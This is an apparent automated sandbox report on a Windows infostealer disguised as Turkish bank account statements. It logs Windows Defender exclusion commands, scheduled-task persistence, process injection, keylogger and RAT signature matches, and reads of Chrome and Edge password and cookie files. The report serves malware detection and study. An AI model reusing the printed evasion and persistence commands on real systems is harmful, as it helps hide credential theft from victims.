Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory written: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory written: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process created: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EfgRyiVrT.exe PID: 760, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
